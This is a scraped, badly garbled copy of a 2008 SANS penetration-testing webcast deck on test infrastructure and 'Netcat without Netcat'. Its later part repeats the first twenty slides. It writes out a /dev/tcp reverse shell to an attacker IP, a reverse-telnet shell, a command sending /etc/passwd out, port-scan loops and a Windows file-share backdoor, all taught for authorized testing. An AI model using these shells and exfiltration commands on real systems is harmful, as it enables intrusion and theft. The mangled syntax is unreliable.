Page 1
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 1
Penetration Testing Ninjitsu 2Crouching Netcat Hidden Vulnerabilities
Copyright 2008 SANS
Version 2Q08
By Ed Skoudis
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 239
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 3
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 439Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 4
Building an Infrastructure for
Ethical Hackingbull Before starting a test you need an
infrastructure including ndash Software
ndash Hardware
ndash Network infrastructure
bull We will discuss some components of abaseline testing infrastructure ndash You will likely tweak or extend it
ndash But it is a reasonable starting point
ndash Wersquoll focus on software and network stuff
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 539Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 5
Linux vs Windowsbull Should you concentrate on Linux or Windows Yes
bull We recommend that your pen test rig include both ndash Virtualized with VMware to rapidly switch between them
bull Donrsquot think of them as two different operatingsystems ndash Think of them as one set of tools you use in your work
ndash Not two different toolboxes but one toolbox with twodifferent compartments
bull Is Mac OS X acceptable
ndash Itrsquos OK but you should have virtual Windows and Linux
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 639Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 6
Software for Testing ndash
Free Test Tools
bull Bootable Linux environments can be very helpful ndash Someone has gone through the difficulty of compilingand installing various tools to make everything work
ndash On of my favorites is Backtrack free athttpwwwremote-exploitorgbacktrackhtml
bull Other free sources of tools
ndash Milw0rm ndash wwwmilw0rmcombull Exploits sorted by OS date localremote etc
ndash Packetstorm Security ndash httppacketstormsecurityorgbull Vast history of attack and defense tools
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 739Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 7
Commercial Toolsbull There are numerous useful commercial tools
available for pen testers providing ndash Typically higher quality and more frequent updates
ndash Support ndash very important for professional testing
bull Useful examples include ndash CORE IMPACT ndash OS network services client-side
and web app exploitation
ndash Tenable Securityrsquos commercialized Nessus ndash OSand network services vulnerability scan
ndash HP SPI Dynamicsrsquo WebInspect ndash web app
vulnerability discovery and exploit
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 839Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 8
Testing Network
Infrastructure - ISPbull For internal testing a fast connection near a backbone with
minimal filtering is idealbull For Internet-based testing you will need to send packets
through your ISP to the target
ndash Scanning ndash large number of sometimes unusual packets ndash Exploitation
bull Some ISPs detect scanning or exploits and then block them ndash Some do this with network-based Intrusion Prevention Systems
bull Can seriously impair your ability to test and the accuracy of your results
bull Tell your ISP that you plan to do pen tests and ask if theyblock
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 939Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 9
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 10
What is Netcat
bull Netcat General-purpose TCP and UDP network widget running on LinuxUnix and Windows
bull Takes Standard In and sends it across the network
bull Receives data from the network and puts it onStandard Out
bull Messages from Netcat itself put on Standard Error
NetcatStd Out Receive packets
Std In Send packets
Std Err
The
System
The
Network
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 11
What Can Netcat Do for Usbull Send files
bull Port scan
bull Backdoor shell access
bull Connecting to arbitrary open portsbull Vulnerability scanning
bull Simple chats
bull Replay data in TCP or UDP packets
bull Relays bouncing between systems
bull Much much morehellip
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 12
What Is Netcat Without
Netcatbull Netcat without Netcat involves constructing commands
that achieve Netcat behaviorhellip ndash hellipwithout the use of Netcat
bull Wersquoll rely on built-in tools only
bull Remember those old ATampT commercials ndash Have you ever kissed your baby goodnighthellip from a payphone
ndash Have you ever made a command shell backdoor using Linuxrsquos devtcp
ndash Have you ever shoveled shell using Linux telnet clients ndash Have you ever made a port scanner using a Windows FTP client
ndash Have you ever made the Windows file system behave like acommand shell
bull YOU WILL
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 13
Why Netcat without Netcatbull For penetration testers
ndash Netcat functionality is very useful in making one systemattack another machine
ndash But the projectrsquos rules of engagement may prohibitinstallation of additional software such as Netcat on
compromised targets ndash Some anti-virus tools detect and block Netcat
ndash Live off the land Be a command-line MacGyver
ndash Where wersquore going we donrsquot need Netcat
Attacker
ConqueredTarget
Next Target
S h e l l
a c c ess
sca na na ly z eex p lo it
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 14
Useful Netcat Functionsbull As wersquove seen Netcat can be used in countless
different waysbull Letrsquos pick some of the most useful and see how we
can make built-in tools do each function on Linux and
Windows ndash Backdoor shell
ndash File transfer
ndash Port scanner
bull Wersquoll vary the order in which we do each action aswersquoll build from fundamental principles to morecomplex techniques
ndash And the order of those principles differs between Linux andWindows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 15
Linuxbull devtcp rocks
bull On most Linux variants (except Debian-derivedsystems like Ubuntu) the default built-in bash canredirect to and from devtcp[IPaddr][port]
ndash Opens a connection with the target IPaddr on that portbull With a little command-line magic we can use this for
Netcat-like behavior
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 16
Linux Command-Line File
Transfer
bull To send a file we can just redirect itscontents into devtcp[IPaddr][port] as in
bull $ cat etcpasswd gt
devtcp[IPaddr][port]bull Catch it on the other side with a Netcat
listener
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 17
Linux Command-Line
Backdoor via devtcpbull We can connect Standard In Standard Out and Standard Error
of a bash shell to devtcp to implement a reverse shellbackdoor
binbash ndashi gt
devtcp[Attacker_IPaddr][port] 0ltamp1
2gtamp1
bull Shovels a shell from the victim Linux machine to attackerrsquoswaiting Netcat listener where commands can be entered
binbash ndashi gt
devtcp
[Attacker_IPaddr]
[port] 0ltamp1 2gtamp1
Firewall
Blocks
incoming
Protected Servernc ndashl ndashp [p]
TYPE COMMANDS
HERE
Commands
executed
here
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 18
Linux Command-Line Reverse
Shell Backdoor In Action
Li C d Li P t
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 19
Linux Command-Line Port
Scannerbull To see if a single port is open we could run$ echo gt devtcp[IPaddr][port]
bull Note that the ldquoConnection Refusedrdquo text is not placed onStandard Output or Standard Error ndash The shell puts them in line so we cannot redirect them to a file
Port 80 is listening
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 20
Storing Results and Iterating
bull But it does set the error condition variable ldquo$rdquo to 0 if the port is open 1 if it is closed
bull For a port scanner we could use a while loop
that increments through port numbers$ port=1 while [ $port ndashlt 1024 ] doecho gt devtcp[IPaddr]$port [ $ ==
0 ] ampamp echo $port is open gtgttmpportstxt port=`expr $port + 1`done
bull We append results in the loop (gtgt tmpportstxt) so that they can be tailed whilethe scan is running ndash I want this to be as operationally clean as possible for
pen testers
d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 21
Command-Line Port Scanner
In Action
5 Not Closed
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 22
Linux Command-Line
Backdoor via ldquoReverse Telnetrdquo bull Therersquos a whole different way we can get remote
shell without using devtcpbull Linux telnet clients let us redirect Standard In and
Standard Out
bull Gives rise to ldquoReverse telnetrdquo bull On target machine we could run$ telnet [attacker_IPaddr] [port1] |
binbash | telnet [attacker_IPaddr][port2]
bull Provide commands on attackerrsquos machine via port1
bull Receive output on attackerrsquos machine on port2
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 23
Reverse Telnet Shell in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 24
Windowsbull Built-in command-line has very clunky syntax
bull Also telnet and ftp clients are absolutelyatrocious
ndash Especially in the way that they (donrsquot) interactwith Standard In and Standard Out
bull Thus we will build Netcat-without-Netcat
from some fundamental command-linebuilding blocks in Windows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25
Building Blocks
Windows FOR Loopsbull Iteration can be very helpful
ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of
itemsbull Numbers
bull Lines in a file
bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter
ndash FOR F Iterate over file contents strings or commandoutput
bull See the first webcast in this series for details on how
these workhellip we wonrsquot go through them again here
Windows Port Scanner Using
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26
Windows Port Scanner Using
Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i
bull Problem When it finds an open port it hangsbull How to address
ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume
ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where
name=telnetexe delete amp ping -n 6 127001
ndash Downside Race condition may kill one that hasnrsquot finished checking
M P bl ith Wi d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27
More Problems with Windows
Telnet Client as a Port Scannerbull Other problems
ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client
ndash Attempts at redirection either make it hang or not run
bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option
bull So you have to watch it sadly
ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land
bull There must be a better way
Wi d P t S U i
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28
Windows Port Scanner Using
FTP Clientbull Windows FTP client Cgt ftp [IPaddr]
bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21
bull Solution But you can specify dest port in an FTP
command file ndash open [IPaddr] [port]
bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]
bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file
displaying or storing results at each iteration
Th Wi d C d Li
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29
The Windows Command Line
Port Scanner Using FTP Clientbull Cgt for L i in (111024) do
echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt
bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad
bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly
Making It Store Results
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30
Making It Store Resultsbull Cgt for L i in
(111024) do
echo Checking
Port i gtgt
portstxt amp echoopen [IP_addr] i
gt ftptxt amp echo
quit gtgt ftptxt ampftp -sftptxt
2gtgtportstxt
Windows Command Line File Transfer
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 2
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 239
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 3
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 439Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 4
Building an Infrastructure for
Ethical Hackingbull Before starting a test you need an
infrastructure including ndash Software
ndash Hardware
ndash Network infrastructure
bull We will discuss some components of abaseline testing infrastructure ndash You will likely tweak or extend it
ndash But it is a reasonable starting point
ndash Wersquoll focus on software and network stuff
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 539Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 5
Linux vs Windowsbull Should you concentrate on Linux or Windows Yes
bull We recommend that your pen test rig include both ndash Virtualized with VMware to rapidly switch between them
bull Donrsquot think of them as two different operatingsystems ndash Think of them as one set of tools you use in your work
ndash Not two different toolboxes but one toolbox with twodifferent compartments
bull Is Mac OS X acceptable
ndash Itrsquos OK but you should have virtual Windows and Linux
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 639Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 6
Software for Testing ndash
Free Test Tools
bull Bootable Linux environments can be very helpful ndash Someone has gone through the difficulty of compilingand installing various tools to make everything work
ndash On of my favorites is Backtrack free athttpwwwremote-exploitorgbacktrackhtml
bull Other free sources of tools
ndash Milw0rm ndash wwwmilw0rmcombull Exploits sorted by OS date localremote etc
ndash Packetstorm Security ndash httppacketstormsecurityorgbull Vast history of attack and defense tools
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 739Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 7
Commercial Toolsbull There are numerous useful commercial tools
available for pen testers providing ndash Typically higher quality and more frequent updates
ndash Support ndash very important for professional testing
bull Useful examples include ndash CORE IMPACT ndash OS network services client-side
and web app exploitation
ndash Tenable Securityrsquos commercialized Nessus ndash OSand network services vulnerability scan
ndash HP SPI Dynamicsrsquo WebInspect ndash web app
vulnerability discovery and exploit
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 839Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 8
Testing Network
Infrastructure - ISPbull For internal testing a fast connection near a backbone with
minimal filtering is idealbull For Internet-based testing you will need to send packets
through your ISP to the target
ndash Scanning ndash large number of sometimes unusual packets ndash Exploitation
bull Some ISPs detect scanning or exploits and then block them ndash Some do this with network-based Intrusion Prevention Systems
bull Can seriously impair your ability to test and the accuracy of your results
bull Tell your ISP that you plan to do pen tests and ask if theyblock
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 939Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 9
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 10
What is Netcat
bull Netcat General-purpose TCP and UDP network widget running on LinuxUnix and Windows
bull Takes Standard In and sends it across the network
bull Receives data from the network and puts it onStandard Out
bull Messages from Netcat itself put on Standard Error
NetcatStd Out Receive packets
Std In Send packets
Std Err
The
System
The
Network
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 11
What Can Netcat Do for Usbull Send files
bull Port scan
bull Backdoor shell access
bull Connecting to arbitrary open portsbull Vulnerability scanning
bull Simple chats
bull Replay data in TCP or UDP packets
bull Relays bouncing between systems
bull Much much morehellip
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 12
What Is Netcat Without
Netcatbull Netcat without Netcat involves constructing commands
that achieve Netcat behaviorhellip ndash hellipwithout the use of Netcat
bull Wersquoll rely on built-in tools only
bull Remember those old ATampT commercials ndash Have you ever kissed your baby goodnighthellip from a payphone
ndash Have you ever made a command shell backdoor using Linuxrsquos devtcp
ndash Have you ever shoveled shell using Linux telnet clients ndash Have you ever made a port scanner using a Windows FTP client
ndash Have you ever made the Windows file system behave like acommand shell
bull YOU WILL
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 13
Why Netcat without Netcatbull For penetration testers
ndash Netcat functionality is very useful in making one systemattack another machine
ndash But the projectrsquos rules of engagement may prohibitinstallation of additional software such as Netcat on
compromised targets ndash Some anti-virus tools detect and block Netcat
ndash Live off the land Be a command-line MacGyver
ndash Where wersquore going we donrsquot need Netcat
Attacker
ConqueredTarget
Next Target
S h e l l
a c c ess
sca na na ly z eex p lo it
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 14
Useful Netcat Functionsbull As wersquove seen Netcat can be used in countless
different waysbull Letrsquos pick some of the most useful and see how we
can make built-in tools do each function on Linux and
Windows ndash Backdoor shell
ndash File transfer
ndash Port scanner
bull Wersquoll vary the order in which we do each action aswersquoll build from fundamental principles to morecomplex techniques
ndash And the order of those principles differs between Linux andWindows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 15
Linuxbull devtcp rocks
bull On most Linux variants (except Debian-derivedsystems like Ubuntu) the default built-in bash canredirect to and from devtcp[IPaddr][port]
ndash Opens a connection with the target IPaddr on that portbull With a little command-line magic we can use this for
Netcat-like behavior
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 16
Linux Command-Line File
Transfer
bull To send a file we can just redirect itscontents into devtcp[IPaddr][port] as in
bull $ cat etcpasswd gt
devtcp[IPaddr][port]bull Catch it on the other side with a Netcat
listener
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 17
Linux Command-Line
Backdoor via devtcpbull We can connect Standard In Standard Out and Standard Error
of a bash shell to devtcp to implement a reverse shellbackdoor
binbash ndashi gt
devtcp[Attacker_IPaddr][port] 0ltamp1
2gtamp1
bull Shovels a shell from the victim Linux machine to attackerrsquoswaiting Netcat listener where commands can be entered
binbash ndashi gt
devtcp
[Attacker_IPaddr]
[port] 0ltamp1 2gtamp1
Firewall
Blocks
incoming
Protected Servernc ndashl ndashp [p]
TYPE COMMANDS
HERE
Commands
executed
here
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 18
Linux Command-Line Reverse
Shell Backdoor In Action
Li C d Li P t
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 19
Linux Command-Line Port
Scannerbull To see if a single port is open we could run$ echo gt devtcp[IPaddr][port]
bull Note that the ldquoConnection Refusedrdquo text is not placed onStandard Output or Standard Error ndash The shell puts them in line so we cannot redirect them to a file
Port 80 is listening
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 20
Storing Results and Iterating
bull But it does set the error condition variable ldquo$rdquo to 0 if the port is open 1 if it is closed
bull For a port scanner we could use a while loop
that increments through port numbers$ port=1 while [ $port ndashlt 1024 ] doecho gt devtcp[IPaddr]$port [ $ ==
0 ] ampamp echo $port is open gtgttmpportstxt port=`expr $port + 1`done
